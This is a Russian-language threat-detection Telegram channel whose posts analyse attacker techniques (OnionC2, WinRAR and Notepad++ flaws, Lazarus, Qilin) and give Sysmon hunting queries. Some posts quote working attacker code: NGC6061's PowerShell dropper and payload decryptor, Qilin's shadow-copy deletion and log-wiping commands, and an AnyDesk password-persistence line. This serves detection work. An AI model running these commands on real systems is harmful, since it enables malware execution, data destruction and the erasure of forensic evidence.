Detection is easy
@detectioneasy
1.03K subscribers
71 photos
2 videos
8 files
176 links
chat: https://t.iss.one/+BF4T6DOGv_UwYTBi
contact: @siemmanager
email: [email protected]
Download Telegram
About
Blog
Apps
Platform
Join
Detection is easy
1.03K subscribers
Detection is easy
Всем привет 💻✌️
Давайте познакомимся с C2-фреймворком OnionC2

Основное преимущество OnionC2 перед аналогами, по мнению автора, — это использование сети Tor для связи сервера и клиента.

By utilizing the Tor network, it ensures that communications between the C2 server and remote systems remain secure, anonymous, and available


🔭 Для формирования гипотез обнаружения и Threat Hunting обратим внимание на следующие особенности агента:

🔤 Для проверки реального IP-адреса агент использует сервис https://checkip.amazonaws.com

🔤 Из коробки идет два варианта закрепа - реестр и Shortcut Takeover

🔤Для реестра, стандартно, отслеживаем создание ключей в *\Software\\Microsoft\\Windows\\CurrentVersion\Run\, имя ключа - Agent

🔤 Shortcut Takeover - для изменения (или создания нового) используется ярлык %USERPROFILE%\Desktop\Microsoft Edge, целевой файл ярлыка - путь до агента, а значение аргумента - --run-lnk, укажет агенту запустить C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe

🔤 Для выполнения команд используется cmd.exe /C

#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10👍4🤔3
1.21K views
Detection is easy
Всем привет 💻✌️

Сталкивались ли вы с ситуацией, когда при расследовании инцидента цепочка приводит к хосту, который уже успели переустановить? 😱

Вспомнил полезное видео с PHD и решил дополнить список инструментов, которые помогут в таких случаях:

🔍 Основные из видео:
🔤 r-studio
🔤 photorec
🔤 strings

Дополнение:
🔤 binwalk
🔤 Windows-Prefetch-Carver
🔤 EVTXtract
🔤 bulk_extractor
🔤 scalpel

А какие инструменты используете вы? Делитесь в комментах! 👇

#dfir@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
VK Видео
Ошибки при реагировании на инциденты в 2023–2024 годах
Кража данных и шифрование — две самые насущные проблемы 2023 года. Каждая компания, столкнувшаяся с ними, пыталась использовать собственные подходы к решению возникших задач, и многие успели наломать дров, учитывая, что они впервые встретились с подобными…
🔥9👍4🤔4👏1
1.08K views
Detection is easy
Всем привет! 💻✌️
Обратили внимание, что жизненный цикл реагирования на инциденты от NIST обновился в NIST.SP.800-61r3? Новая версия руководства интегрирована с Cybersecurity Framework (CSF) 2.0

На рисунке показана высокоуровневая модель жизненного цикла реагирования на инциденты, основанная на шести функциях:
- Управление (Govern): Стратегия, ожидания и политика организации в области управления рисками кибербезопасности устанавливаются, доводятся до сведения и отслеживаются
- Идентификация (Identify): анализируются текущие риски
- Защита (Protect): используются меры защиты для управления рисками
- Обнаружение (Detection): выявляются и анализируются возможные инциденты
- Реагирование (Respond): принимаются меры по реагированию в отношении обнаруженного инцидента
- Восстановление (Recover): восстанавливаются активы и процессы, затронутые инцидентом

Все шесть функций взаимосвязаны и формируют непрерывный процесс, где подготовка (управление, идентификация, защита) служит фундаментом для комплексной системы защиты.

Подготовка (управление, идентификация, защита) теперь выделена в отдельный этап, который не входит в процесс реагирования, но является основой для предотвращения инцидентов и снижения их последствий.

Реагирование (обнаружение, реагирование, восстановление) организовано как отдельный цикл, что связано с развитием MSSP (Managed Security Service Providers) и MDR (Managed Detection and Response). Эти сервисы позволяют организациям передать на аутсорс мониторинг и реагирование на инциденты, что особенно важно для малого и среднего бизнеса.


#dfir@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥8👍6🤔21
1.07K views
Detection is easy
Всем привет! 💻✌️

У коллег из BI.ZONE вышел отчет об использовании новых уязвимостей в WinRAR

Уязвимости использовались для получения доступа к хостам жертв - фишинг.

Письмо имеет вложение - rar-архив, который эксплуатирует CVE‑2025‑6218. Уязвимость позволяет вредоносному архиву при распаковке записывать файлы за пределами целевого каталога - значит мы можем закрепиться в папку автозагрузки текущего пользователя.

🔭 Обнаружение строится достаточно легко:


ProviderName="Microsoft-Windows-Sysmon" and  EventId = 11 and Image endswith "winrar.exe" and TargetFilename = ".*\Microsoft\Windows\Start Menu\Programs\Startup\"


Если атакующие продвинутые можно комбнировать несколько процедур, например заменить LNK на рабочем столе или разместить там RDP-rogue файл... Это уже будет другое правило)

#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥12👍63🤔2
1.01K views
Detection is easy
лучший opendir)
и названия полезные)😂
😁14🔥6👍4🍌3
1.11K views
Detection is easy
Всем привет! 💻✌️
Давайте рассмотрим несколько способов закрепления в системе, которые использовали Lazarus 😤

Они использовали уязвимость - Phantom DLL Loading, в службе SessionEnv
Для обнаружения такого поведения можем отслеживать создание dll-файлов в директории Windows\System32\

🔭 Обнаружение:


ProviderName="Microsoft-Windows-Sysmon" and  EventId = 11 and 
(
TargetFilename contains \Windows\System32\TSMSISrv.dll 
or
TargetFilename contains \Windows\System32\TSVIPSrv.dll
)


#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Fox-IT International blog
Three Lazarus RATs coming for your cheese
Authors: Yun Zheng Hu and Mick Koomen Introduction In the past few years, Fox-IT and NCC Group have conducted multiple incident response cases involving a Lazarus subgroup that specifically targets…
👍8🔥5🥰4
1.09K views
Detection is easy
Всем привет! 💻✌️

Коллеги из bi.zone уведомили о новых техниках Fluffy Wolf

Давайте вспомним как это было в прошлогоднем отчете. Хакеры использовали схему фишинга RAR (с паролем) -> COM. Примечательно, что пароль был указан в имени архива, возможно использовалось для обхода антифишинга

🔭 Обнаружение:
🔤 в двух кампаниях злоумышленники используют раширение com, вместо exe, можем этим воспользоваться для хантинга
🔤 можем похантить имена файлов с "парол|pass"
🔤 создать правило обнаружения таких файлов


ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename contains "\Users\" and (Image contains "парол" or Image contains "pass")



ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename contains "\Users\" and (Image endswith ".com")


#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
BI.ZONE
«Давайте сверимся»: как Fluffy Wolf использует акты сверки в атаках
Группировка действует просто, но эффективно: фишинговая рассылка для первоначального доступа, а в ней — исполняемый файл. Так Fluffy Wolf получает удаленный доступ, крадет учетные данные или использует ресурсы взломанной инфраструктуры для майнинга
🔥11👍72🤔2
1.19K viewsedited  
Detection is easy
Всем привет! 💻✌️

Команда any.run выпустила интересный материал о применении SVG-файлов в фишинге.

Что важно помнить?

Файл формата SVG (векторная графика), часто используется злоумышленниками для обхода стандартных механизмов защиты. Такие файлы могут содержать код скриптов

🔭 Обнаружение:

🔤 можем отслеживать создание SVG-файлов в каталогах пользователей:


ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFilename contains "\\Users\\" and TargetFilename endswith ".svg"


#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
ANY.RUN
🚨 Malicious SVG Leads to Microsoft-Themed PhishKit.
We observed a phishing campaign that began with testing activity on September 10 and scaled into full spam activity by September 15.

⚠️ A legitimate domain was abused to host a malicious SVG disguised…
🔥84👍4
1.19K viewsedited  
Detection is easy
Всем привет! 💻✌️

Коллеги из ЛК отметили, что группировка RevengeHotels (TA558) использует LLM для разработки дроперов на JS. Отличительная особенность - большое количество комментариев и отсутствие обфускации

🔭 Обнаружение:

🔤 Ищем JS-файлы по паттерну *.js в директориях пользователя


ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFilename endswith ".js" and TargetFilename contains ":\Users\"


🔤 Для закрепа VenomRAT использует ключ реестра HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 


ProviderName="Microsoft-Windows-Sysmon" and EventId=13 and EventType="SetValue" and TargetObject startswith "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"

обнаружим Run, RunOnce, RunOnceEx

🔤 Малварь копирует себя на съемные диски под именем My Pictures.exe. Отслеживаем создание EXE-файлов на съемных устройствах


ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFilename endswith ".exe" and TargetFilename matches "[C-M]:\\\\.*" and not Image endswith "explorer.exe"


#detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9🤔5👍4
864 viewsedited  
Detection is easy
Всем привет! 💻✌️

Коллеги из Zero Salarium описали кейс, когда при создании новой задачи или службы указывается несуществующий исполняемый файл, например, C:\TMP\test

При создании процесса CreateProcess пытается найти указанный файл, если test не существует, система автоматически ищет в той же директории файл test.exe
Таким образом, если в папке C:\TMP\ лежит файл test.exe, он будет успешно запущен

Такой же трюк можно сделать с двойным расширением:
В задаче указываем c:\temp\test.exe, а в директории будет файл c:\temp\test.exe.exe

В целом ничего страшного не происходит, нужно проверить (доработать), что автореспонс (и скрипты) найдут файл, указанный в задаче

🔭 Обнаружение (Threat Hunting):

🔤 мониторим процессы и файлы с двойным расширением
🔤 можем смапить путь к файлу в реестре (задаче или службы) и его наличие на диске

#detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Zerosalarium
Stealthy Persistence With Non-Existent Executable File
Exploiting the mechanism that automatically searches for additional executable files when Windows detects that the requested file does not exist
🔥10
809 viewsedited  
Detection is easy
как думаете в 4688 новый процесс будет с каким расширением?
Anonymous Quiz
47%
exe
53%
exe.exe
105 voters675 views
Detection is easy
Всем привет! 💻✌️
Solar выпустил отчет о фишинговых кампаниях, применяемых группировкой NGC6061

Атака начинается с фишингового письма, которое содержит ZIP -> self-extracted LNK

При запуске ярлыка выполняется следующий ps-скрипт. Скрипт извелекает из LNK два файла - ps1, decoy-docx, сохраняет их в c:\windows\Temp и запускает


powershell.exe -exec bypass -w 1 -c $p=Get-ChildItem -Path $env:userprofile -Include Interview_questions.doc.lnk -Recurse;
$tbytes=[System.IO.File]::ReadAllBytes($p); $tstr=$tbytes|ForEach-Object{$_.ToString('X2')};
for($i=0;$i-le$tstr.Length;$i++){
    if($tstr[$i]-eq'24'-and$tstr[$i+1]-eq'42'){
        $st=$i;break;
    }
} 
for($i=0;$i-le$tstr.Length;$i++){
    if($tstr[$i]-eq'50'-and$tstr[$i+1]-eq'4B'-and$tstr[$i+2]-eq'03'){
        $ed=$i;
        break;
    }
} 
for($j=$st;$j-lt$ed;$j++){
    $ec+=$tstr[$j]
}
for($l=$ed;$l-le$tstr.Length;$l++){
    $oc+=$tstr[$l];
}
$by=[byte[]]($ec -split '([0-9a-f]{2})'|Where-Object{$_ -match '[0-9a-f]{2}'}|ForEach-Object{[Convert]::ToByte($_, 16)});
$cy=[byte[]]($oc -split '([0-9a-f]{2})'|Where-Object{$_ -match '[0-9a-f]{2}'}|ForEach-Object{[Convert]::ToByte($_, 16)}); $ye=[system.Text.Encoding]::default.getstring($by); [System.IO.File]::WriteAllBytes('c:\windows\temp\u1.ps1', $by); [System.IO.File]::WriteAllBytes('c:\windows\temp\1.docx', $cy); 
start-process c:\windows\temp\1.docx; 
powershell.exe -exec bypass -w 1 -f c:\windows\temp\u1.ps1;


Второй скрипт расшифровывает полезную нагрузку, проверяет количество логических процессоров и если их меньше двух 2, то запускает decoy, иначе запускает бинарь



$B64="<base64_encode_str>"
$TDESKEY = 'fRTYUIOEGo6nMYPcyCnEJc4qVRTkGY82'
function decode($EncryptedData) {
    $Data = $EncryptedData.Split(':')
    $TD = New-Object System.Security.Cryptography.TripleDESCryptoServiceProvider
    $Key = [Convert]::FromBase64String($TDESKEY)
    $IV = [Convert]::FromBase64String($Data[0])
    $DataByte = [Convert]::FromBase64String($Data[1])
    $MS = New-Object System.IO.MemoryStream(,$DataByte)
    $CS = New-Object System.Security.Cryptography.CryptoStream($MS,$TD.CreateDecryptor($Key,$IV), [System.Security.Cryptography.CryptoStreamMode]::Read)
    $Reader = New-Object System.IO.StreamReader($CS)
    $Result = $Reader.ReadToEnd()
    $Reader.Dispose()
    $Bytes=[System.Convert]::FromBase64String($Result)
    [System.IO.File]::WriteAllBytes( "c:\windows\temp\cgi2.exe",$Bytes)
    return $Bytes

}
$t3=Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty NumberOfLogicalProcessors;
if($t3 -le 2)
{
    calc.exe;
}
else
{
    [byte[]]$readb=decode($B64);
    start-sleep(100);
    c:\windows\temp\cgi2.exe
}


Интересно, что пути захардкожены c:\windows\temp\

🔭 Для обнаружения достаточно индикаторов:

🔤 Создание LNK с ADS NTFS в %Temp% или в одной из директорий пользователя
🔤 Анализ опасных-командлетов powershell System.Security.Cryptography, WriteAllBytes, System.IO.File, ReadAllBytes, byte[], ToByte

#detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍5🤔3
820 views
Detection is easy
Всем привет! 💻✌️
Давайте продолжим обзор отчета Solar о фишинговых кампаниях, применяемых группировкой NGC6061

В 2025 году, группировка продолжает использовать self-extracted LNK, но последним этапом стал дроп файлов KeyScrambler.exe и KeyScramblerIE.dll, (exe-легитимный бинарь, а dll-metasploit дропер)

KeyScrambler.exe - антикейлоггер, уязвим к DLL sideloading

🔭 Обнаружение:

🔤 Отслеживание файлов с именем KeyScramblerIE.dll. Можем похантить в $mft


ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFilename contains "KeyScramblerIE.dll"


🔤 Загрузка библиотеки с именем KeyScramblerIE.dll


ProviderName="Microsoft-Windows-Sysmon" and EventId=7 
and Image endswith "KeyScrambler.exe"
and ImageLoaded endswith "KeyScramblerIE.dll" 
and SignatureStatus != "Valid" 
and Signature != "QFX Software Corporation"


UPD:
🔤 можем похантить в amcache и prefetch - KeyScrambler.exe

#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
rt-solar.ru
NGC6061: Фишинговая атака на госорганы России в 2024-2025 годах
Технический анализ фишинговой кампании NGC6061 против госсектора. Рассматриваем самораспаковывающиеся LNK-файлы, Powershell-скрипты и уникальный пакер для Metasploit. Подробный разбор угрозы
🔥7👍3
698 viewsedited  
Detection is easy
Всем привет! 💻✌️

Продолжим рассматривать уязвимости, связанные с загрузкой dll

Notepad++ уязвим к DLL hijacking, на GitHub представили poc CVE-2025-56383

🔭Обнаружение:

🔤 Можем отслеживать создание DLL - NppConverter.dll, без EXE - notepad++.exe

🔤 Можем отслеживать загрузку в память библиотеки без подписи


ProviderName="Microsoft-Windows-Sysmon" and EventId=7 
and Image endswith "notepad++.exe"
and ImageLoaded endswith "NppExport.dll" 
and SignatureStatus != "Valid" 
and Signature != "Notepad++"


#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥93👏3
713 views
Detection is easy
Всем привет! 💻✌️

Давайте познакомимся с отчетом коллег из Angara MTDR

Фишинговое письмо содрежит *.scr файл который мимикрирует под PDF, после его открытия извлекаются несколько файлов cmd и bat. Одна из команд создает закреп через AnyDesk


echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access


🔭 Обнаружение:

🔤 отслеживать в командной строке совпадение с ".exe --set-password". Пример правила есть в Sigma, как по мне нужно добавить \.exe|\.scr|\.com

🔤 отслеживать по запуску и подписи бинаря, наличию в командной строке --set-password


Description: AnyDesk
Product: AnyDesk
Company: AnyDesk Software GmbH



#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
www.angarasecurity.ru
Специалисты Angara MTDR зафиксировали активизацию деятельности группировки Rare Werewolf
Специалисты Angara MTDR зафиксировали активизацию деятельности группировки Rare Werewolf. Angara Security: Бесперебойно отражаем и предотвращаем киберугрозы для бизнеса и государства
🔥62👍2
673 views
Detection is easy
Всем привет! 💻✌️

В разборе TTP Qilin авторы описывают этап подготовки перед шифрованием

🔤остановка службы и удаление теневых копий


wmic service where name=’vss’ call ChangeStartMode Manual
net start vss
vssadmin.exe delete shadows /all /quiet
net stop vss
wmic service where name=’vss’ call ChangeStartMode Disabled


🔤очистка логов во всех журналах


“powershell” $logs = Get-WinEvent -ListLog * | Where-Object {$_.RecordCount} | Select-Object -ExpandProperty LogName ; ForEach ( $l in $logs | Sort | Get-Unique ) {[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($l)}


🔤закреп в реестре


HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run


🔭 Обнаружение:

🔤 отслеживаем использование wmic, vssadmin
🔤 отслеживаем использование ps - ClearLog, Get-WinEvent
🔤 создание новых ключей в ветке реестра *\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
ASEC
선택적 암호화 알고리즘을 사용하는 Qilin 랜섬웨어 분석 - ASEC
선택적 암호화 알고리즘을 사용하는 Qilin 랜섬웨어 분석 ASEC
🔥8👍2🤔2
851 views
Detection is easy
Кроме всего при создании закрепа Qilin начинают имя ключа со * в ветке реестра SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Для чего?
Anonymous Quiz
48%
Обход правил обнаружения
22%
Запутывание, ничего не отработает
30%
Файл запустится в безопасном режиме
98 voters886 views